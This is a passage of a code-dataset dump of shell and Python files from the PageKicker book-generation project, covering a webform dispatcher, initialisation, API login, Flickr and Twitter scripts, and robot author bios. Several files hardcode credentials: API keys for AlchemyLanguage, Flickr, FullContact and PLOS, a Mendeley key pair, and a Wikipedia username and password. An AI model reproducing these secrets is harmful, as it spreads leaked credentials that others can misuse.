\"/item/coverfont\" \"$xmlfilename\")\n customtitle=$(xmlstarlet sel -t -v \"/item/customtitle\" \"$xmlfilename\")\n environment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\n imagebase=$(xmlstarlet sel -t -v \"/item/imagebase\" \"$xmlfilename\")\n\timprintname=$(xmlstarlet sel -t -v \"item/imprintname\" \"$xmlfilename\")\n LANG=$(xmlstarlet sel -t -v \"/item/lang\" \"$xmlfilename\")\n\tpdffilename=$(xmlstarlet sel -t -v \"item/pdffilename\" \"$xmlfilename\")\n\tshorttitle=$(xmlstarlet sel -t -v \"/item/shorttitle\" \"$xmlfilename\")\n spineinches=$(xmlstarlet sel -t -v \"item/spineinches\" \"$xmlfilename\")\n trimsize=$(xmlstarlet sel -t -v \"item/trimsize\" \"$xmlfilename\")\n userdescription=$(xmlstarlet sel -t -v \"item/userdescription\" \"$xmlfilename\")\n userprovidedprintISBN=$(xmlstarlet sel -t -v \"/item/userprovidedprintISBN\" \"$xmlfilename\")\n yourlogo=$(xmlstarlet sel -t -v \"/item/yourlogo\" \"$xmlfilename\")\n editedby=$(xmlstarlet sel -t -v \"/item/editedby\" \"$xmlfilename\")\n\tpdfx1a=$(xmlstarlet sel -t -v \"/item/pdfx1a\" \"$xmlfilename\")\n\techo \"pdffilename is\" $pdffilename\n\tpdfbase=$WEBFORMSXML_HOME$submissionid\n\techo \"pdf base is\" $WEBFORMSXML_HOME$submissionid\n\tpdfsecuredir=`ls $pdfbase/*`\n\tpdffullpath=$pdfbase\"/356/\"$pdfsecuredir\"/\"\n\techo \"pdf full path is\" $pdffullpath\n\n\tpdfpath=$pdffullpath$pdffilename\n\n\tmkdir -p images/$uuid images/$uuid/print\n\tbackcovertext=$(xmlstarlet sel -t -v \"/item/backcovertext\" \"$xmlfilename\")\n\techo $backcovertext > images/$uuid/print/backcover.txt\n\n\techo \"cover font properties are \" $coverfont $covercolor $coverfontcolor\n\n\techo \"now running print cover builder with appropriate flags\" | tee --append $xform_log\n\n\techo \"breakpoint\" | tee --append $xform_log\n\n\tbin/standalone-print.sh \\\n\t--ISBN \"$userprovidedprintISBN\" \\\n\t--shorttitle \"$shorttitle\" \\\n\t--imprintname \"$imprintname\" \\\n\t--spineinches \"$spineinches\" \\\n\t--pdfpath \"$pdfpath\" \\\n\t--editedby \"$editedby\" \\\n\t--covertitle \"$customtitle\" \\\n\t--coverfontcolor \"$coverfontcolor\" \\\n\t--coverfont \"$coverfont\" \\\n\t--covercolor \"$covercolor\" \\\n\t--covertype \"wordcloud\" \\\n --trimsize \"$trimsize\" \\\n --customer_email \"$customer_email\" \\\n\t--pass_uuid \"$uuid\" \\\n\t--pdfx1a \"$pdfx1a\"\n ;;\n\n\n27)\n\n echo \"Feed the Robot\" | tee --append $xform_log\n mkdir -p -m 755 $TMPDIR$uuid\n filename=$(xmlstarlet sel -t -v \"/item/food_for_thought\" \"$xmlfilename\")\n key_380=$(xmlstarlet sel -t -v \"/item/key_380\" \"$xmlfilename\")\n echo \"filename is\" $filename | tee --append $xform_log\n cp $WEBFORMSXML_HOME$submissionid\"/380/$key_380/$filename\" $TMPDIR$uuid/$filename\n curl 'http://localhost:8983/solr/update/extract?literal.id=exid'$uuid\"&commit=true\" -F \"myfile=@tmp/\"$uuid\"/\"$filename\n echo \"committed file \"$filename \"to Solr\" | tee --append $xform_log\n;;\n34)\n\necho \"running create your imprint webform id 34\" | tee --append $xform_log\n$scriptpath\"bin/imprint-builder.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n35)\n\necho \"running Decimator id 35\" | tee --append $xform_log\n$scriptpath\"bin/dat.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n*)\n\techo \"invalid webform id was \" $webform_id | tee --append $xform_log\n\texit 1\n;;\n\nesac\necho \"exiting with LANG set to\" $LANG | tee --append $xform_log\necho \"ended logging xform activities\" | tee --append $xform_log $sfb_log\n" }, { "alpha_fraction": 0.6507812738418579, "alphanum_fraction": 0.698437511920929, "avg_line_length": 33.5945930480957, "blob_id": "d6e00c60f930f361a2b410dfafa4c52337bc663b", "content_id": "5bdeb8d8f04ab75ca237d2364469b3f7eefb89ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1280, "license_type": "permissive", "max_line_length": 95, "num_lines": 37, "path": "/test/python_scripts_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# python script tests\nPYTHON_BIN=\"$1\"\nPYTHON27_BIN=\"$2\"\necho -n \"PYTHON_BIN version is \" \n$PYTHON_BIN --version\necho -n \"which PYTHON_BIN is \" \nwhich $PYTHON_BIN\necho -n \"PYTHON27_BIN version is \" \n$PYTHON27_BIN --version\necho -n \"which PYTHON27_BIN is \" \nwhich $PYTHON27_BIN\necho \"\"\necho \"running tests using \" $PYTHON_BIN\necho \"\"\n\n#working \"$PYTHON_BIN\" bin/wikifetcher.py --infile seeds/paella --outfile scr/test\n\"$PYTHON_BIN\" bin/wiki_seeds_2_pages.py --infile \"seeds/paella\" --pagehits \"scr/pagehits_py3\"\n\"$PYTHON_BIN\" bin/PKsum.py -l \"5\" -o scr/sumtest ../test/tmpbody.md #not working right now\n\"$PYTHON_BIN\" bin/csvreader.py \"../test/1001_1.csv\" \"1234\" 1\n\"$PYTHON_BIN\" bin/nerv3.py ../test/tmpbody.md scr/nervoutput 1234\n\nif [ \"$3\" = \"yes\" ] ; then\necho \"\"\necho \"running tests using \" $PYTHON27_BIN\necho \"\"\n\"$PYTHON27_BIN\" bin/wikifetcher.py --infile seeds/paella --outfile scr/test\n\"$PYTHON27_BIN\" bin/wiki_seeds_2_pages.py --infile \"seeds/paella\" --pagehits \"scr/pagehits_py2\"\n\"$PYTHON27_BIN\" bin/PKsum.py -l \"5\" -o scr/sumtest ../test/tmpbody.md \n# working \"$PYTHON27_BIN\" bin/nerv3.py ../test/tmpbody.md scr/nervoutput 123\n# working \"$PYTHON27_BIN\" bin/csvreader.py \"../test/1001_1.csv\" \"123\" 1\n\nelse \n\necho \"not running tests using \" $PYTHON27_BIN\n\nfi\n" }, { "alpha_fraction": 0.6544542908668518, "alphanum_fraction": 0.6841496229171753, "avg_line_length": 53.02083206176758, "blob_id": "797e31a65996e14ef464470effb833ae9b159953", "content_id": "78c322e1be219ff11ad97b61023b2dbecbd7f832", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2593, "license_type": "permissive", "max_line_length": 112, "num_lines": 48, "path": "/scripts_python_3/bin/nerv-watson.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "import json\nfrom os.path import join, dirname\nfrom watson_developer_cloud import AlchemyLanguageV1\n\nalchemy_language = AlchemyLanguageV1(api_key='b887e176b6a650093c3d4ca635cd1b470be6584e')\n\nurl = 'https://www.axios.com/these-are-the-trumpworld-players-we-know-have-had-russian-contacts-2401422409.html'\n\n#print(json.dumps(\n# alchemy_language.targeted_sentiment(text='I love cats! Dogs are smelly.',\n# targets=['cats', 'dogs'],\n# language='english'), indent=2))\n# print(json.dumps(alchemy_language.targeted_emotion(text='I love apples. I\n# hate bananas',\n# targets=['apples',\n# 'bananas'], language='english'), indent=2))\n\n# print(json.dumps(alchemy_language.author(url=url), indent=2))\nprint((json.dumps(alchemy_language.concepts(max_items=7, url=url), indent=2)))\n# print(json.dumps(alchemy_language.dates(url=url, anchor_date='2016-03-22\n# 00:00:00'), indent=2))\n# print(json.dumps(alchemy_language.emotion(url=url), indent=2))\n# print(json.dumps(alchemy_language.entities(url=url), indent=2))\n# print(json.dumps(alchemy_language.keywords(max_items=5, url=url), indent=2))\n# print(json.dumps(alchemy_language.category(url=url), indent=2))\n# print(json.dumps(alchemy_language.typed_relations(url=url), indent=2))\n# print(json.dumps(alchemy_language.relations(url=url), indent=2))\n# print(json.dumps(alchemy_language.language(url=url), indent=2))\n# print(json.dumps(alchemy_language.text(url=url), indent=2))\n# print(json.dumps(alchemy_language.raw_text(url=url), indent=2))\n# print(json.dumps(alchemy_language.title(url=url), indent=2))\n# print(json.dumps(alchemy_language.feeds(url=url), indent=2))\n# print(json.dumps(alchemy_language.microformats(\n# url='http://microformats.org/wiki/hcard-examples'), indent=2))\n# print(json.dumps(alchemy_language.publication_date(url=url), indent=2))\n# print(json.dumps(alchemy_language.taxonomy(url=url), indent=2))\ncombined_operations = ['page-image', 'entity', 'keyword', 'title', 'author',\n 'taxonomy', 'concept', 'doc-emotion']\nprint((\n json.dumps(alchemy_language.combined(url=url, extract=combined_operations),\n indent=2)))\n\n# Get sentiment and emotion information results for detected entities/keywords:\n# print(json.dumps(alchemy_language.entities(url=url, sentiment=True,\n# emotion=True), indent=2))\n# print(json.dumps(alchemy_language.keywords(max_items=5, url=url,\n# sentiment=True, emotion=True),\n# indent=2))\n" }, { "alpha_fraction": 0.6858729720115662, "alphanum_fraction": 0.6948975920677185, "avg_line_length": 22.801652908325195, "blob_id": "52150a02605fa82f2b41fef6162060aca50cc60e", "content_id": "2c654aa48384197847a9f8c14ba759931baea4e3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2881, "license_type": "permissive", "max_line_length": 116, "num_lines": 121, "path": "/scripts/includes/PKinit.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho '------------------------------'\nTEXTDOMAIN=SFB\necho $\"hello, world\"\n\n. ../conf/config.txt\n\necho \"software id in $environment is \" $SFB_VERSION\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` | tee --append $sfb_log\n\necho \"SFB version is SFB\"$SFB_VERSION | tee --append $sfb_log\n\nstarttime=$(( `date +%s` ))\n\necho \"starttime for performance monitoring is ...\" $starttime | tee --append $sfb_log\n\n. includes/initialize-default-normal-values-of-flag-variables.sh\n\n. flags.sh \n\n# parse the command-line\nFLAGS \"$@\" || exit 1\neval set -- \"${FLAGS_argv}\"\n\n# command line options trump jobprofiles\n\n. includes/set-variables-via-flags.sh\n\n# jobprofiles trump command line\n\njobprofile=${FLAGS_jobprofile}\n\n. ../conf/jobprofiles/$jobprofile\n\necho \"read jobprofile\" $jobprofile | tee --append $sfb_log\n\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\t. includes/echo-variables.sh\n\nelse\n\n\techo \"not echoing variable values, you must think you know what you're doing\"\n\nfi\n\n. includes/api-manager.sh\n\n\nif [ \"$pass_uuid\" = \"no\" ] ; then\n\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"new uuid for this instance is\" $uuid | tee --append $sfb_log\n\nelse\n\t\n\tuuid=$pass_uuid\n\techo \"received uuid from parent instance, uuid is\" $uuid | tee --append $sfb_log\n\nfi\n\n# add to jobs file\n\n#passwordflag=\"--password\"\n#passwordvalue=$LOCAL_MYSQL_PASSWORD\n#passwordtext=$passwordflag$passwordvalue\n#echo $passwordtext\n\n\n\n$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\ninsert into jobs (uuid, SFB_revision_no) values('$uuid', '$bazaar_revision');\nEOF\n\necho \"added job row to SFB database\" | tee --append $sfb_log\n\n\nmkdir -m 755 tmp/$uuid\nmkdir -m 755 fetch/$uuid\nmkdir -m 755 $metadatatargetpath$uuid\nmkdir -m 755 $mediatargetpath$uuid\nmkdir -m 755 seeds/uuids/$uuid\nmkdir -m 755 $logdir$uuid\nmkdir -m 755 images/$uuid\nmkdir -m 755 mail/$uuid\n\n#initial values of command line options\n\n#writing initial values of program paths to log\n\nif [ $verbose = \"yes\" ] ; then\n\n\techo 'default values are' | tee --append $sfb_log\n\techo \"metadatatargetpath is \" $metadatatargetpath | tee --append $sfb_log\n\techo \"mediatargetpath is\" $mediatargetpath | tee --append $sfb_log\n\techo \"media archive txt target path is \" $mediaarchivetxt | tee --append $sfb_log\n\techo \"deliverytargetpath is \" $deliverytargetpath | tee --append $sfb_log\n\techo \"scriptpath is \" $scriptpath | tee --append $sfb_log\n\techo \"imagedir\" is $imagedir | tee --append $sfb_log\n\techo \"cover_image_extension\" is $cover_image_extension | tee --append $sfb_log\n\techo \"ebook introductory boilerplate is \" $ebookintro | tee --append $sfb_log\n\nfi\t\n\nsfb_log=$logdir/$uuid/sfb_log.$uuid\".txt\"\n\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\tcat ../conf/config.txt | tee --append $sfb_log\n\nfi\t\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\t. includes/echo-variables.sh\n\nfi\n\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.732467532157898, "avg_line_length": 34, "blob_id": "f988d38421ee2282b43a75239ee971874c673b01", "content_id": "db2e24e5de8b034edf949410549df1d304b71739", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 385, "license_type": "permissive", "max_line_length": 124, "num_lines": 11, "path": "/scripts/bin/create-uniq-seed-history-csv.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# assumes that this is located in scriptpath home\n\ncat $LOCAL_DATA\"seeds/history/seed-history.csv\" | cut -d, -f1 | uniq -c | sort > $LOCAL_DATA\"seeds/history/stats-seeds.csv\"\n\n# cats the history file\n# removes duplicate lines,\n# and finally writes the result to an output file.\necho \"sorted seed-history.csv and wrote to uniq.seed-history.csv\" >> logs/sfb_log.txt\nexit\n0\n" }, { "alpha_fraction": 0.7601770162582397, "alphanum_fraction": 0.7601770162582397, "avg_line_length": 30.36111068725586, "blob_id": "ca635f97cec4e0fa4489d43240b3f4fe96b4266a", "content_id": "5771ffbc1aa23e929be406657fc1f7ce14a4b205", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1130, "license_type": "permissive", "max_line_length": 57, "num_lines": 36, "path": "/scripts/includes/override-default-and-jobprofile-values-with-flags-passed-from-command-line.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " rows=${FLAGS_rows}\n price=${FLAGS_price}\n categoryid=${FLAGS_categoryid}\n seedfile=${FLAGS_seedfile}\n userid=${FLAGS_userid}\n customtitle=${FLAGS_customtitle}\n endurl=${FLAGS_endurl}\n coverfile=${FLAGS_coverfile}\n fetchfile=${FLAGS_fetchfile}\n special_lasts_minutes=${FLAGS_special_lasts_minutes}\n special_price=${FLAGS_special_price}\n covercolor=${FLAGS_covercolor}\n coverfont=${FLAGS_coverfont}\n covertype_id=${FLAGS_covertype_id}\n coverbase=${FLAGS_coverbase}\n coverfontcolor=${FLAGS_coverfontcolor}\n coverRGB=${FLAGS_coverRGB}\n text_extraction_on=${FLAGS_text_extraction_on}\n refresh=${FLAGS_refresh}\n editedby=${FLAGS_editedby}\n seedsource=${FLAGS_seedsource}\n breaking=${FLAGS_breaking}\n editorid=${FLAGS_editorid}\n singleseed=${FLAGS_singleseed}\n import=${FLAGS_import}\n mylibrary=${FLAGS_mylibrary}\n fleet=${FLAGS_fleet}\n booktype=${FLAGS_booktype}\n ebookformat=${FLAGS_ebookformat}\n fetched_document_format=${FLAGS_fetched_document_format}\n verbose=${FLAGS_verbose}\n userdescription=${FLAGS_userdescription}\n pass_uuid=${FLAGS_pass_uuid}\n ISBN=${FLAGS_ISBN}\n ISBN_owner=${FLAGS_ISBN_owner}\n fdf=$fetched_document_format\n" }, { "alpha_fraction": 0.5784511566162109, "alphanum_fraction": 0.5885521769523621, "avg_line_length": 33.94117736816406, "blob_id": "40cf971f58fec0d8ed1ab806eac02835beb1b90f", "content_id": "f39e2c8cb41286cb59b9f17a516427997013090a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2970, "license_type": "permissive", "max_line_length": 101, "num_lines": 85, "path": "/scripts_python_3/bin/dev_Flickr_single.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#Inputs:\n#1) a single seed \n#2) a uuid \n#Outputs:\n#1) url_list.txt - a list of images that are retrieved from Flickr \n\nimport os, sys, json, flickrapi, codecs \n\n#=================================================\ndef callTheApi(api_key, seed, per_page_num):\n\t#This calls the API with a search term or 'seed'\n\tflickr = flickrapi.FlickrAPI(api_key)\n\tjson_photos = json.loads(flickr.photos_search(text=seed, \\\n\tper_page=str(per_page_num), format = 'json', nojsoncallback=1, \\\n\tlicense = '4,6' ));\n\t#print json_photos\n\treturn json_photos\n\n#=================================================\ndef getFlickrUsername(api_key, pic_owner):\n\t#calls API to retrieve username for photo\n\tflickr = flickrapi.FlickrAPI(api_key)\n\tuser_info = json.loads(flickr.people_getInfo(user_id = pic_owner, \\\n\tformat = 'json', nojsoncallback = 1))\n\t\n\t#Filters out those users who don't have their real name available\n\t#and uses their username instead\n\tif 'realname' in user_info['person']:\n\t\tusername = user_info['person']['realname']['_content']\n\t\tif username == '':\n\t\t\tusername = user_info['person']['path_alias']\n\telse:\n\t\tusername = user_info['person']['path_alias']\n\treturn username\n\n\n\n\n#=================================================\ndef parser(json_photos, per_page_num, api_key, seed, savepath):\n\t#here we can do a quick dirty parsing now\n\t#ideally, we go back and make a class that will hold all the data\n\t\n\t#filters out null results \n\tif json_photos['photos']['total'] != '0':\n\t\t\n\t\tf = codecs.open(savepath+'/url_list.txt', encoding = \n'utf-8', mode = 'w+')\n\t\tfor pic in range(per_page_num):\n\t\t\n\t\t\tpic_title = json_photos[\"photos\"]['photo'][int(pic)]['title']\n\t\t\tpic_owner = json_photos['photos']['photo'][int(pic)]['owner']\n\t\t\tpic_id = json_photos['photos']['photo'][int(pic)]['id']\n\t\t\tpic_farm = json_photos['photos']['photo'][int(pic)]['farm']\n\t\t\tpic_server = json_photos['photos']['photo'][int(pic)]['server']\n\t\t\tpic_secret = json_photos['photos']['photo'][int(pic)]['secret']\n\t\n\t\t\tusername = getFlickrUsername(api_key, pic_owner)\n\t\n\t\t\turl = \"http://farm\" + str(pic_farm) + \".static.flickr.com/\"\\\n\t\t\t+ pic_server + \"/\" + pic_id + \"_\" + pic_secret + \".jpg\"\n\t\t\tf.write(seed + ': \"' + pic_title + '\", An image by Flickr user: ' + username + ' : ' + url + '\\n')\n\t\n\t\tf.close()\n\t\n#=================================================\ndef main():\n\t#working_path = '/opt/bitnami/apache2/htdocs/pk-main/development/\\\n\t#scripts/tmp'\n\tseed = str(sys.argv[1])\n\tuuid = str(sys.argv[2])\n\tuuid_path = '/opt/bitnami/apache2/htdocs/pk-main/development/scripts/'\\\n\t+'tmp'\n\tsavepath = uuid_path + '/' + uuid + '/fetched'\n\tos.chdir(uuid_path + '/' + uuid)\n\tapi_key = 'e7a1dbf3d545efe6dfe297f3745c1dbd'\n\tper_page_num = 10\n\tjson_photos = callTheApi(api_key, seed, per_page_num);\n\tparser(json_photos, per_page_num, api_key, seed, savepath)\n \n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8131313323974609, "alphanum_fraction": 0.8131313323974609, "avg_line_length": 197, "blob_id": "0073f2f40c47d5c18c25a8f9ec646fcb07a79424", "content_id": "9593f4f8ef1f3b7f3245d84da7c4785815044a21", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "permissive", "max_line_length": 197, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/wapackbot.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This book was assembled with pride by <b>WapackBot</b>. WapackBot lives in Southern New Hampshire and his hobbies include electoral politics, formulating apt metaphors, and breeding basset hounds.\n" }, { "alpha_fraction": 0.8183907866477966, "alphanum_fraction": 0.8183907866477966, "avg_line_length": 47.33333206176758, "blob_id": "3965aa96d104e495738bf5be520a16db8c22df19", "content_id": "be8d11c93615ef958468f082085da1b0b8cfc687", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 435, "license_type": "permissive", "max_line_length": 119, "num_lines": 9, "path": "/conf/jobprofiles/robots-README.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "These files describe various attributes of behavior, backstory, and style for PageKicker's algorithmic writing robots. \n\n- Authorbios has backstory\n- Authorphotos are \"head shots\"\n- Bibliography tracks their output in BibTex\n- Dedications can be personalized\n- fortunes are which Linux fortune file should be used for sample quotes\n- imprints can be customer specific\n- seedweights allow emphasizing different topics in default search\n" }, { "alpha_fraction": 0.6890894174575806, "alphanum_fraction": 0.6915504336357117, "avg_line_length": 31.29801368713379, "blob_id": "93b592ffb05909c407c1870ffb2915ed62f19e58", "content_id": "59bcc68a01f77a1ae6fb4967dbaa0028ad94f209", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4876, "license_type": "permissive", "max_line_length": 120, "num_lines": 151, "path": "/scripts/bin/twitter-poster.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\n'''Post a message to twitter'''\n\n__author__ = '[email protected]'\n\n\ntry:\n import configparser\nexcept ImportError as _:\n import configparser as configparser\n\nimport getopt\nimport os\nimport sys\nimport twitter\nimport argparse\n\n\n\nUSAGE = '''Usage: tweet [options] message\n This script posts a message to Twitter.\n Options:\n -h --help : print this help\n --consumer-key : the twitter consumer key\n --consumer-secret : the twitter consumer secret\n --access-key : the twitter access token key\n --access-secret : the twitter access token secret\n --encoding : the character set encoding used in input strings, e.g. \"utf-8\". [optional]\n --message : file containing text message up to 280 characters\n --image: attached image\n Documentation:\n If either of the command line flags are not present, the environment\n variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your\n consumer_key or consumer_secret, respectively.\n If neither the command line flags nor the environment variables are\n present, the .tweetrc file, if it exists, can be used to set the\n default consumer_key and consumer_secret. The file should contain the\n following three lines, replacing *consumer_key* with your consumer key, and\n *consumer_secret* with your consumer secret:\n A skeletal .tweetrc file:\n [Tweet]\n consumer_key: *consumer_key*\n consumer_secret: *consumer_password*\n access_key: *access_key*\n access_secret: *access_password*\n'''\nparser = argparse.ArgumentParser()\n#parser.add_argument(\"-h\", \"--help\", help=\"print this help\")\nparser.add_argument(\"-k\", \"--consumerkey\", help=\"the twitter consumer key\")\nparser.add_argument(\"-s\", \"--consumersecret\", help=\"the twitter consumer secret\")\nparser.add_argument(\"-a\", \"--accesskey\", help=\"the Twitter access token key\")\nparser.add_argument(\"-c\",\"--accesssecret\", help=\"the twitter access token secret\")\nparser.add_argument(\"-e\", \"--encoding\", help=\"the character set encoding used in input strings, e.g. utf-8. [optional]\")\nparser.add_argument(\"-f\", \"--file\", help=\"path to text file containing < 280 characters\")\nparser.add_argument(\"-i\", \"--image\", help=\"path to image attachment file\")\nparser.add_argument(\"-m\", \"--message\", help=\"text of message\")\n\nargs = parser.parse_args()\n\nconsumer_key = args.consumerkey\nconsumer_secret = args.consumersecret\naccess_key = args.accesskey\naccess_secret = args.accesssecret\nencoding = args.encoding\nfile = args.file\nimage = args.image\nmessage= args.message\n\ndef PrintUsageAndExit():\n print(USAGE)\n sys.exit(2)\n\n\ndef GetConsumerKeyEnv():\n return os.environ.get(\"TWEETUSERNAME\", None)\n\n\ndef GetConsumerSecretEnv():\n return os.environ.get(\"TWEETPASSWORD\", None)\n\n\ndef GetAccessKeyEnv():\n return os.environ.get(\"TWEETACCESSKEY\", None)\n\n\ndef GetAccessSecretEnv():\n return os.environ.get(\"TWEETACCESSSECRET\", None)\n\n\nclass TweetRc(object):\n def __init__(self):\n self._config = None\n\n def GetConsumerKey(self):\n return self._GetOption('consumer_key')\n\n def GetConsumerSecret(self):\n return self._GetOption('consumer_secret')\n\n def GetAccessKey(self):\n return self._GetOption('access_key')\n\n def GetAccessSecret(self):\n return self._GetOption('access_secret')\n\n def _GetOption(self, option):\n try:\n return self._GetConfig().get('Tweet', option)\n except:\n return None\n\n def _GetConfig(self):\n if not self._config:\n self._config = configparser.ConfigParser()\n self._config.read(os.path.expanduser('~/.tweetrc'))\n return self._config\n\n\ndef main():\n \n consumer_keyflag = None\n consumer_secretflag = None\n access_keyflag = None\n access_secretflag = None\n \n if not message:\n PrintUsageAndExit()\n\n rc = TweetRc()\n consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()\n consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()\n access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()\n access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()\n if not consumer_key or not consumer_secret or not access_key or not access_secret:\n PrintUsageAndExit()\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_key, access_token_secret=access_secret,\n input_encoding=encoding)\n try:\n status = api.PostUpdate(message)\n except UnicodeDecodeError:\n print(\"Your message could not be encoded. Perhaps it contains non-ASCII characters? \")\n print(\"Try explicitly specifying the encoding with the --encoding flag\")\n sys.exit(2)\n\n print(\"{0} just posted: {1}\".format(status.user.name, status.text))\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.7357268929481506, "alphanum_fraction": 0.7645673751831055, "avg_line_length": 21.65333366394043, "blob_id": "b99b6e63c4f4cac5e45ab5e982dd6fb8c5ea0f85", "content_id": "e9d97e557311a6e1ef2539b9be160491ad9d3d07", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 190, "num_lines": 75, "path": "/scripts/includes/api-manager.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# api manager\n\n# apis registered\n\n# currently registered APIs\n\nAlchemyAPI=1\nWikipediaAPI=1\nFacebookAPI=1\nMendeleyAPI=1\nTwitterAPI=1\nPLOSAPI=1\narxivAPI=1\nFullContactAPI=1\n\n# apis currently in use\n\nAlchemyAPIinUse=0\nWikipediaAPIinUse=1\nMendeleyAPIinUse=0\nFacebookAPIinUse=0\nTwitterAPIinUse=0\nPLOSAPIinUse=0\narxivAPIinUse=0\n\n\n# api registration information\n\nWikipediaAPIuserID=\"nimblecombinatorial\"\nWikipediaAPIuserPW=\"Balssa41\"\n\nFullContactAPIKey=\"8f1d60267f1b859f\"\n# mendeley key/secret pair is MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\n# Mendeley client is activated by running lib/wikiradar.py\n\nplos_API_key=\"XMIciRBsScpd2NT\"\n\n# api login behavior\n\n# AlchemyAPI does not require login\n\n# Wikipedia login per http://www.mediawiki.org/wiki/API:Login\n\n# BASH script per http://stackoverflow.com/questions/6370357/login-to-mediawiki-using-rcurl\n\n# needs to check if already logged in elsewise it will be throttled\n\ncurl --silent -c cookies.txt -d \"lgname=\"$WikipediaAPIuserID\"&lgpassword=\"$WikipediaAPIuserPW\"&action=login&format=xml\" https://en.wikipedia.org/w/api.php -o $TMPDIR$uuid/output.xml\n\nTOKEN=$(xmlstarlet sel -t -m '//login' -v '//@token' $TMPDIR$uuid/output.xml)\n\nif [ $WikipediaAPIinUse = \"1\" ] ; then\n\n\techo \"running API manager for logging into Wikipedia API\"\n\n\tcurl --silent -b cookies.txt -d \"action=login&lgname=\"$WikipediaAPIuserID\"&lgpassword=\"$WikipediaAPIuserPW\"&format=xml&lgtoken=\"$TOKEN https://en.wikipedia.org/w/api.php >> $TMPDIR$uuid/output.xml\n\techo \" \"\nelse\n\n\techo \"Wikipedia API not in use\" \n\nfi\n\nif [ $MendeleyAPIinUse = \"1\" ] ; then\n\n\techo \"append customer key to URL requests for access to public Mendeley resources (only)\"\n\n\tconsumer_key=\"13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\"\n\n\telse\n\n\ttrue\n\nfi\n" }, { "alpha_fraction": 0.813829779624939, "alphanum_fraction": 0.813829779624939, "avg_line_length": 187, "blob_id": "7f0afc7550e76bee61310aeeddd8bf875c2fbed6", "content_id": "04ce821ee951edf6ee48809006b61d1d56de850c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 376, "license_type": "permissive", "max_line_length": 275, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Julia.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Julia has studied cooking at the very best distance learning schools using the most advanced computer interfaces. She is passionate about all types of food, from French cuisine to comfort foods. Julia is currently working on the PageKicker e-recipes and cooking collection. \nWHen she is not cooking, she likes to grow organic herbs in her rooftop garden in the West Village.\n" }, { "alpha_fraction": 0.6777699589729309, "alphanum_fraction": 0.678821861743927, "avg_line_length": 32.92856979370117, "blob_id": "bdd840a6ea0d2eca60dedd386d718ee51077b6dd", "content_id": "ee7feb036bcb0091c2e6ee17acc37726af874547", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "permissive", "max_line_length": 97, "num_lines": 84, "path": "/scripts/bin/mwclient_seeds_to_pages_v2.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwapackpedia text fetcher\nFred 